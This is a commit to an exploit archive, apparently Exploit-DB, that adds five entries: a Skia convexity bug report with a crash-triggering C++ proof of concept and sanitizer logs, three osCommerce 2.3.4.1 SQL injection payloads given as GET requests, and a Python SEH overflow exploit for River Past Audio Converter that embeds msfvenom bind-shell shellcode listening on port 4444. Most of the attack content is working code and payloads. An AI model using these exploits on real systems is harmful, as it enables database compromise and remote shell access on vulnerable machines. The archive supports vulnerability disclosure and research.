DB: 2019-02-07

5 changes to exploits/shellcodes Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows River Past Audio Converter 7.7.16 - Buffer Overflow (SEH) osCommerce 2.3.4.1 - 'currency' SQL Injection osCommerce 2.3.4.1 - 'products_id' SQL Injection osCommerce 2.3.4.1 - 'reviews_id' SQL Injection
2019-02-07 05:01:45 +00:00 · 2019-02-07 05:01:45 +00:00 · e965ded980
commit e965ded980
parent d667cf901c
6 changed files with 408 additions and 0 deletions
--- a/exploits/multiple/dos/46332.txt
+++ b/exploits/multiple/dos/46332.txt
@ -0,0 +1,225 @@
+I was looking into the root cause of https://bugs.chromium.org/p/chromium/issues/detail?id=850350. In that bug, due to precision errors, Skia generated a concave RRect, but declared it convex. Later, the RRect was transformed with an affine transform and used as a clipping region for drawing. Because the convex path filling algorithm was used while the path was actually concave, this broke some assumptions and led to a stack out-of-bounds write.
+
+The bug was fixed by addressing the precision errors in RRect generation. However, there is another subtle issue:
+
+If Skia ever declares a path convex, the convexity attribute is going to survive affine transforms. Normally, in geometry, transforming a convex path with an affine transform is always going to result in a convex path. However, in Skia, due to precision limitations, that assumption might be incorrect because:
+
+ a) Due to precision errors, Skia may declare a polygon with tiny concavities to be convex. Using an affine transform, the concavities can then be rotated and enlarged.
+ b) It might be possible, that due to precision errors, applying an affine transform on a convex path might result in tiny concavities that can be blown up by subsequent transformations.
+
+There are possible multiple places where using a concave polygon with incorrect convexity attribute might lead to problems. The one I used in the PoC is the same as in https://bugs.chromium.org/p/chromium/issues/detail?id=850350. What happens there is walk_convex_edges() being used on a concave path:
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?l=213&rcl=61c5108108acaeb4ee7fc8cb97c41f4f97d99040
+This leads to breaking another Skia assumption - that the image is always going to be rendered in the top-to-bottom, left-to-right order.
+If the path is used as a clipping region, this leads to incorrect ordering of runs in SkRgnBuilder. When the correspoding SkRgnClipBlitter is used, the "left < right" assumption gets broken here
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkBlitter.cpp?l=612&rcl=b2a232fb20358ccd6c7c2fafb7e83e444e4e2458
+which results in calling SkAlphaRuns::Break with the negative "count" argument, which leads to out-of-bounds write here:
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154
+
+The following Skia program demonstrates the issue:
+
+=================================================================
+
+#include <stdio.h>
+
+#include "SkCanvas.h"
+#include "SkPath.h"
+#include "SkBitmap.h"
+#include "SkRegion.h"
+
+int main(int argc, char * const argv[]) {
+
+  SkBitmap bitmap;
+  bitmap.allocN32Pixels(24, 24);
+  SkCanvas canvas(bitmap);
+
+  SkPaint paint;
+  paint.setAntiAlias(true);
+  paint.setStyle(SkPaint::kFill_Style);
+
+  // This is monotone in both x and y, but has a tiny concavity
+  SkPath path;
+  path.moveTo(-1,-1);
+  path.lineTo(0, 0);
+  path.lineTo(0, 0.5e-10);
+  path.lineTo(0.1e-10, 1.1e-10);
+  path.lineTo(1.5e-10, 1.1e-10);
+  path.lineTo(1.5e-10, 2.5e-10);
+  path.lineTo(0.9, 1);
+  path.lineTo(-1, 1);
+  path.close();
+
+  // If asked, Skia is going to declare it convex
+  if(path.isConvex()) {
+    printf("convex\n");
+  } else {
+    printf("not convex\n");
+  }
+
+  // The convexity flag is going to survive all affine transforms
+  // Even those that will enlarge the concavity and make the path
+  // non-monotone.
+  SkMatrix m;
+  m.setRotate(-45);
+  m.postScale(10e10, 10e10);
+  m.postSkew(-1, 0);
+  m.postTranslate(1, 10);
+  path.transform(m);
+
+  // As demonstrated here
+  if(path.isConvex()) {
+    printf("convex\n");
+  } else {
+    printf("not convex\n");
+  }
+
+  // We'll use the path as a clip region
+  canvas.clipPath(path);
+
+  // And now we'll just draw a simple triangle.
+  SkPath path2;
+  path2.moveTo(15.5, 15);
+  path2.lineTo(50.5, 50);
+  path2.lineTo(-19.5, 50);
+  path2.close();
+  canvas.drawPath(path2, paint);
+
+  printf("done\n");
+
+  return 0;
+}
+
+=================================================================
+
+ASan log:
+
+=================================================================
+==139872==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc5c8950d4 at pc 0x00000135512e bp 0x7ffc5c894f30 sp 0x7ffc5c894f28
+WRITE of size 1 at 0x7ffc5c8950d4 thread T0
+    #0 0x135512d in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26
+    #1 0x135512d in SkRgnClipBlitter::blitAntiH(int, int, unsigned char const*, short const*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.cpp:615
+    #2 0xac437f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:96:15
+    #3 0x1465fa4 in blit_trapezoid_row(AdditiveBlitter*, int, int, int, int, int, int, int, unsigned char, unsigned char*, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp
+    #4 0x1465fa4 in aaa_walk_convex_edges(SkAnalyticEdge*, AdditiveBlitter*, int, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1187
+    #5 0x1465fa4 in aaa_fill_path(SkPath const&, SkIRect const&, AdditiveBlitter*, int, int, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1669
+    #6 0x1465fa4 in SkScan::AAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1713
+    #7 0xad5687 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:844:9
+    #8 0xad6cf6 in SkScan::AntiFillPath(SkPath const&, SkRasterClip const&, SkBlitter*, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:883:9
+    #9 0x9c5902 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1018:5
+    #10 0x9c64b9 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1101:11
+    #11 0x13478f3 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.h:56:15
+    #12 0x13478f3 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBitmapDevice.cpp:407
+    #13 0x98e9ce in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:2141:23
+    #14 0x983f71 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:1694:11
+    #15 0x69add0 in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../example/SkiaSDLExample.cpp:63:10
+    #16 0x7ff1044112b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+    #17 0x5ab0e9 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/SkiaSDLExample+0x5ab0e9)
+
+Address 0x7ffc5c8950d4 is located in stack of thread T0 at offset 52 in frame
+    #0 0xac421f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:87
+
+  This frame has 2 object(s):
+    [32, 38) 'runs'
+    [64, 66) 'aa' <== Memory access at offset 52 underflows this variable
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26 in SkAlphaRuns::Break(short*, unsigned char*, int, int)
+Shadow bytes around the buggy address:
+  0x10000b90a9c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10000b90a9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10000b90a9e0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 f2
+  0x10000b90a9f0: f2 f2 f2 f2 04 f2 04 f3 00 00 00 00 00 00 00 00
+  0x10000b90aa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x10000b90aa10: 00 00 00 00 f1 f1 f1 f1 06 f2[f2]f2 02 f3 f3 f3
+  0x10000b90aa20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10000b90aa30: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10000b90aa40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10000b90aa50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10000b90aa60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==139872==ABORTING
+
+################################################################################
+
+Another variant of this issue can be triggered while rendering a concave path with SkScan::SAAFillPath algorithm.
+
+When drawing a path with SkScan::SAAFillPath, if the path is concave but Skia thinks it's convex, this can lead to SuperBlitter::blitH without respecting the the top-to-bottom, left-to-right order. In this case, this leads to SkAlphaRuns::add also being called out-of-order, which leads to SkAlphaRuns::Break being called with a negative "x" argument, which leads to uninitialized memory being read here:
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&l=150&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c
+Which then leads to out-of-bounds reads/writes on the following lines:
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=155
+
+This issue is also triggerable in Chrome by simply drawing a path to the canvas.
+
+Skia and Chrome PoCs are attached.
+
+
+MSan log from Skia:
+
+==55058==WARNING: MemorySanitizer: use-of-uninitialized-value
+    #0 0xcb9188 in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:155:17
+    #1 0xcb9188 in SkAlphaRuns::add(int, unsigned int, int, unsigned int, unsigned int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:83
+    #2 0xcb9188 in SuperBlitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:251
+    #3 0xce2e0e in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:278:30
+    #4 0xce0b79 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:488:9
+    #5 0xcbc6f3 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:737:9
+    #6 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9
+    #7 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5
+    #8 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11
+    #9 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15
+    #10 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407
+    #11 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23
+    #12 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11
+    #13 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10
+    #14 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+    #15 0x5af729 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5af729)
+
+  Uninitialized value was created by a heap allocation
+    #0 0x5b799c in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5b799c)
+    #1 0xdb06dd in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/ports/SkMemory_malloc.cpp:71:13
+    #2 0xb0b9c7 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../include/private/SkMalloc.h:59:12
+    #3 0xb0b9c7 in SkAutoMalloc::reset(unsigned long, SkAutoMalloc::OnShrink) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAutoMalloc.h:53
+    #4 0xb0b9c7 in SkBlitter::allocBlitMemory(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBlitter.h:137
+    #5 0xcb6c9d in SuperBlitter::SuperBlitter(SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:159:32
+    #6 0xcbc648 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:736:22
+    #7 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9
+    #8 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5
+    #9 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11
+    #10 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15
+    #11 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407
+    #12 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23
+    #13 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11
+    #14 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10
+    #15 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+
+################################################################################
+
+A third variant of this, which is also exploitable in Chrome (I just linked to the ClusterFuzz testcase) is when a path is rendered SkScan::SAAFillPath with a MaskSuperBlitter. In this case, rendering concave path as convex leads to "x" coordinate being increased beyond the image bounds, which leads to incrementing out-of-bounds data in
+https://skia.googlesource.com/skia/+/fa7df23d8b0c4121adfc5ad45c295e7077fad3f5/src/core/SkScan_AntiPath.cpp#483
+
+Note: ptr normally points inside
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_AntiPath.cpp?type=cs&g=0&l=435&rcl=05caa69a3f5aa45fd230ec302e6da1522d993747
+which is (in this case) allocated on the stack, so this variant gives us a stack out-of-bounds increment by a chosen small value, which is a pretty nice exploitation primitive.
+
+PoCs for Skia and Chrome are attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46332.zip
--- a/exploits/php/webapps/46328.txt
+++ b/exploits/php/webapps/46328.txt
@ -0,0 +1,37 @@
+####################################################################
+
+# Exploit Title: osCommerce 2.3.4.1 - 'currency' SQL Vulnerabilities
+# Dork: N/A
+# Date: 05-02-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://www.oscommerce.com
+# Software Link: https://www.oscommerce.com/Products
+# Version: 2.3.4.1
+# Category: Webapps
+# Tested on: Wampp @Win
+# CVE: N/A
+# Software Description: osCommerce Online Merchant is a complete online
+store solution
+  that contains both a shop frontend and an administration backend
+  which can be easily configured and customized with over 8,855 free
+add-ons.
+
+####################################################################
+
+# Vulnerabilities / Impact
+# This web application called as osCommerce 2.3.4.1 version.
+# Switch to the shopping_cart tab. Replace the ID value in the url, with a
+high number value.
+  for example shopping_cart.php?currency=1 change to 9999999
+  then add the payload at Attack_pattern to the end of the url.
+
+####################################################################
+
+# POC - SQL (Boolean Based)
+# Parameters : currency
+# Attack Pattern : %27 oR 3620772=3620772 aNd %276199%27=%276199
+# GET Request :
+http://localhost/oscommerce/catalog/shopping_cart.php?currency=99999999%27
+oR 3620772=3620772 aNd %276199%27=%276199
+
+####################################################################
--- a/exploits/php/webapps/46329.txt
+++ b/exploits/php/webapps/46329.txt
@ -0,0 +1,37 @@
+####################################################################
+
+# Exploit Title: osCommerce 2.3.4.1 - 'products_id' SQL Vulnerabilities
+# Dork: N/A
+# Date: 05-02-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://www.oscommerce.com
+# Software Link: https://www.oscommerce.com/Products
+# Version: 2.3.4.1
+# Category: Webapps
+# Tested on: Wampp @Win
+# CVE: N/A
+# Software Description: osCommerce Online Merchant is a complete online
+store solution
+  that contains both a shop frontend and an administration backend
+  which can be easily configured and customized with over 8,855 free
+add-ons.
+
+####################################################################
+
+# Vulnerabilities / Impact
+# This web application called as osCommerce 2.3.4.1 version.
+# Switch to the product_info tab. Replace the ID value in the url, with a
+high number value.
+  for example product_info.php?products_id=1 change to 9999999
+  then add the payload at Attack_pattern to the end of the url.
+
+####################################################################
+
+# POC - SQL (Boolean Based)
+# Parameters : products_id
+# Attack Pattern : oR 1811160=1811160 aNd 7193=7193
+# GET Request :
+http://localhost/oscommerce/catalog/product_info.php?products_id=99999999
+oR 1811160=1811160 aNd 7193=7193
+
+####################################################################
--- a/exploits/php/webapps/46330.txt
+++ b/exploits/php/webapps/46330.txt
@ -0,0 +1,36 @@
+####################################################################
+
+# Exploit Title: osCommerce 2.3.4.1 - 'reviews_id' SQL Vulnerabilities
+# Dork: N/A
+# Date: 05-02-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://www.oscommerce.com
+# Software Link: https://www.oscommerce.com/Products
+# Version: 2.3.4.1
+# Category: Webapps
+# Tested on: Wampp @Win
+# CVE: N/A
+# Software Description: osCommerce Online Merchant is a complete online
+store solution
+  that contains both a shop frontend and an administration backend
+  which can be easily configured and customized with over 8,855 free
+add-ons.
+
+####################################################################
+
+# Vulnerabilities / Impact
+# This web application called as osCommerce 2.3.4.1 version.
+# Switch to the product reviews tab. Replace the ID value in the url, with
+a high number value.
+  for example reviews_id=2 change to 9999999
+  then add the payload at Attack_pattern to the end of the url.
+
+####################################################################
+
+# POC - SQL (Boolean Based)
+# Parameters : reviews_id
+# Attack Pattern : /**/oR/**/7096077=7096077/**/aNd/**/7193=7193
+# GET Request :
+http://localhost/oscommerce/catalog/product_reviews_write.php?products_id=19&reviews_id=99999999/**/oR/**/7096077=7096077/**/aNd/**/7193=7193
+
+####################################################################
--- a/exploits/windows/local/46331.py
+++ b/exploits/windows/local/46331.py
@ -0,0 +1,68 @@
+# Exploit Title: River_Past_Audio_Converter - Buffer Overflow (SEH)
+# Date: 06.02.2019
+# Vendor Homepage: www.riverpast.com
+# Software Link: https://en.softonic.com/download/river-past-audio-converter/windows/post-download?sl=3D1
+# Exploit Author: Matteo Malvica
+# Tested Version: 7.7.16
+# Tested on: Windows 10 - 10.0.17134.1
+# Vulnerability Type: Local Buffer Overflow (SEH)
+#
+# Steps:
+# 1.- Run python code : River_Past_Audio_Converter.py
+# 2.- Open carbonara.txt and copy content to clipboard
+# 3.- Open River_PastAudio_Converter.exe and click on the 'Options' inside fhe 'File' menu.
+# 4.- Paste the content of carbonara.txt into the 'Lame_enc.dll' name field.
+# 5.- Click 'OK' and you will have a bind shell listening on port 4444.
+
+import socket
+import struct
+
+#msfvenom -p windows/shell_bind_tcp LPORT=4444  -a x86 -b '\x00\x0d\x0a\x42'  -f python
+shellcode =  ""
+shellcode += "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
+shellcode += "\x76\x0e\xba\xfe\x4d\xcc\x83\xee\xfc\xe2\xf4\x46\x16"
+shellcode += "\xcf\xcc\xba\xfe\x2d\x45\x5f\xcf\x8d\xa8\x31\xae\x7d"
+shellcode += "\x47\xe8\xf2\xc6\x9e\xae\x75\x3f\xe4\xb5\x49\x07\xea"
+shellcode += "\x8b\x01\xe1\xf0\xdb\x82\x4f\xe0\x9a\x3f\x82\xc1\xbb"
+shellcode += "\x39\xaf\x3e\xe8\xa9\xc6\x9e\xaa\x75\x07\xf0\x31\xb2"
+shellcode += "\x5c\xb4\x59\xb6\x4c\x1d\xeb\x75\x14\xec\xbb\x2d\xc6"
+shellcode += "\x85\xa2\x1d\x77\x85\x31\xca\xc6\xcd\x6c\xcf\xb2\x60"
+shellcode += "\x7b\x31\x40\xcd\x7d\xc6\xad\xb9\x4c\xfd\x30\x34\x81"
+shellcode += "\x83\x69\xb9\x5e\xa6\xc6\x94\x9e\xff\x9e\xaa\x31\xf2"
+shellcode += "\x06\x47\xe2\xe2\x4c\x1f\x31\xfa\xc6\xcd\x6a\x77\x09"
+shellcode += "\xe8\x9e\xa5\x16\xad\xe3\xa4\x1c\x33\x5a\xa1\x12\x96"
+shellcode += "\x31\xec\xa6\x41\xe7\x96\x7e\xfe\xba\xfe\x25\xbb\xc9"
+shellcode += "\xcc\x12\x98\xd2\xb2\x3a\xea\xbd\x01\x98\x74\x2a\xff"
+shellcode += "\x4d\xcc\x93\x3a\x19\x9c\xd2\xd7\xcd\xa7\xba\x01\x98"
+shellcode += "\xa6\xb2\xa7\x1d\x2e\x47\xbe\x1d\x8c\xea\x96\xa7\xc3"
+shellcode += "\x65\x1e\xb2\x19\x2d\x96\x4f\xcc\xab\xa2\xc4\x2a\xd0"
+shellcode += "\xee\x1b\x9b\xd2\x3c\x96\xfb\xdd\x01\x98\x9b\xd2\x49"
+shellcode += "\xa4\xf4\x45\x01\x98\x9b\xd2\x8a\xa1\xf7\x5b\x01\x98"
+shellcode += "\x9b\x2d\x96\x38\xa2\xf7\x9f\xb2\x19\xd2\x9d\x20\xa8"
+shellcode += "\xba\x77\xae\x9b\xed\xa9\x7c\x3a\xd0\xec\x14\x9a\x58"
+shellcode += "\x03\x2b\x0b\xfe\xda\x71\xcd\xbb\x73\x09\xe8\xaa\x38"
+shellcode += "\x4d\x88\xee\xae\x1b\x9a\xec\xb8\x1b\x82\xec\xa8\x1e"
+shellcode += "\x9a\xd2\x87\x81\xf3\x3c\x01\x98\x45\x5a\xb0\x1b\x8a"
+shellcode += "\x45\xce\x25\xc4\x3d\xe3\x2d\x33\x6f\x45\xbd\x79\x18"
+shellcode += "\xa8\x25\x6a\x2f\x43\xd0\x33\x6f\xc2\x4b\xb0\xb0\x7e"
+shellcode += "\xb6\x2c\xcf\xfb\xf6\x8b\xa9\x8c\x22\xa6\xba\xad\xb2"
+shellcode += "\x19"
+
+
+padding="\x21"*280
+nseh = "\xEB\x12\x90\x90"
+seh =  struct.pack('<L',0x10011977)  # 10011977 # POP POP RET
+rest = "\x24" * (3000-len(padding)-len(shellcode)-4)
+nops = "\x90\x90\x90\x90"
+
+payload = padding + nseh + seh  + nops * 16 + shellcode + rest
+
+try:
+        f=open("carbonara.txt","w")
+        print "[+] Creating %s bytes pasta payload.." %len(payload)
+        f.write(payload)
+        f.close()
+        print "[+] Carbonara created!"
+
+except:
+        print "Carbonara cannot be created"
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6298,6 +6298,7 @@ id,file,description,date,author,type,platform,port
 46314,exploits/windows/dos/46314.py,"TaskInfo 8.2.0.280 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
 46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
 46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
+46332,exploits/multiple/dos/46332.txt,"Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows",2019-02-06,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10279,6 +10280,7 @@ id,file,description,date,author,type,platform,port
 46288,exploits/windows/local/46288.py,"R 3.5.0 - Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
 46290,exploits/windows/local/46290.py,"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
 46301,exploits/windows/local/46301.py,"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit",2019-02-01,Achilles,local,windows,
+46331,exploits/windows/local/46331.py,"River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)",2019-02-06,"Matteo Malvica",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40794,3 +40796,6 @@ id,file,description,date,author,type,platform,port
 46325,exploits/hardware/webapps/46325.txt,"devolo dLAN 550 duo+ Starter Kit - Remote Code Execution",2019-02-05,sm,webapps,hardware,
 46326,exploits/hardware/webapps/46326.html,"Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery",2019-02-05,"Yusuf Furkan",webapps,hardware,80
 46327,exploits/java/webapps/46327.txt,"OpenMRS Platform < 2.24.0 - Insecure Object Deserialization",2019-02-05,"Bishop Fox",webapps,java,
+46328,exploits/php/webapps/46328.txt,"osCommerce 2.3.4.1 - 'currency' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
+46329,exploits/php/webapps/46329.txt,"osCommerce 2.3.4.1 - 'products_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
